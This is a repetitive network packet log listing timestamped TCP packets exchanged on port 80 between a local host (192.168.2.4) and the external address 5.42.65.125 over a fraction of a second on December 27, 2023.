Dec 27, 2023 18:12:25.390983105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391005039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391050100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391057968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391084909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391089916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391114950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391123056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391149998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391175032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391181946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391190052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391216993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391242027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391248941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391259909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391287088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391300917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391308069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391319990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391339064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391355991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391366005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391372919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391386032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391391993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391408920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391411066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391432047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391855001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391863108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391901970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391925097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391933918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391940117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391947031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.391962051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.391978025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392014027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392021894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392034054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392060041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392076969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392083883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392096043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392118931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392123938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392131090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392164946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392174959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392183065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392190933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392209053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392225027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392231941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392232895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392263889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392288923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392296076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392308950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392337084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392368078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392374992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392380953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392388105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392419100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392435074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.392894983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.392956018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393013954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393026114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393047094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393090963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393193960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393286943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393292904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393305063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393311024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393327951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393352985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393356085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393359900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393372059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393379927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393399000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393423080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393547058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393553972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393559933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393565893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393572092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393582106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393587112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393589020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393595934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393603086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393610001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393615007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393615961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393637896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393652916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393785954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393795967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393826962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393898964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.393935919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.393951893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394015074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394026041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394052982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394063950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394071102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394105911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394290924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394298077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394304991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394313097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394320011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394328117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394340038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394360065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394367933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394367933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394376040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394397974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394418955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394426107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394438028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394445896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394464970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394493103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394500017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394511938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394519091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394525051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394535065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394536972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394543886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394563913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394581079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.394860983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.394999981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395006895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395020008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395026922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395034075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395050049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395071983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395121098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395128012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395134926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395140886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395153046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395159006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395159960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395168066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395179033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395181894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395196915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395207882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395209074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395216942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395222902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395235062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395240068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395246983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395255089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395257950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395266056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395277023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395277977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395284891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395297050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395306110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395328045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395334959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395817041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395824909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395859003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395883083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395889997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395896912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395905018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395910978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395927906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395929098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395936966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.395946026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.395979881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396107912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396115065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396126986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396132946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396140099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396150112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396151066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396157980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396172047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396178961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396179914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396186113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396193027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396195889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396200895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396207094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396210909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396214008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396222115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396229982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396235943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396244049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396260023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396277905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396749020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396755934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396763086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396785975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396797895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396806002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396836996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396871090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396904945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396912098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396948099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396950006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.396959066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396991968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.396992922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397000074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397032976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397057056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397064924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397077084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397099018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397125006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397131920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397144079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397150993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397167921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397191048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397196054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397203922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397237062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397270918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397278070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397289991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397298098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397315025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397682905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397736073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397746086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397753000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397758961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397766113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397783041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397806883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397819042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397865057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397872925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397906065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.397965908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397973061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397985935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397991896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.397999048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398010969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398011923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398019075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398026943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398036957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398051977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398087978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398094893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398107052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398113012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398119926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398130894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398132086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398139954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398147106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398150921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398154020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398168087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398192883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398638010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398647070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398683071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398716927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398742914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398808956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398817062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398823023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398829937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398853064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398885012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398909092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398916006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398927927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398935080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398941994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398952961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.398952961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398978949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.398993969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399020910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399029016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399039984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399046898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399054050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399065971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399066925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399072886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399079084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399085999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399092913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399092913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399100065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399111986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399135113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399545908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399583101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399662018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399669886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399702072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399736881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399744987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399777889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399808884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399816990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399822950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399846077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399857998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399864912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399880886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399894953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399918079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.399950027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399955988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399966955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.399974108 CET	80	49738	5.42.65.125	192.168.2.4
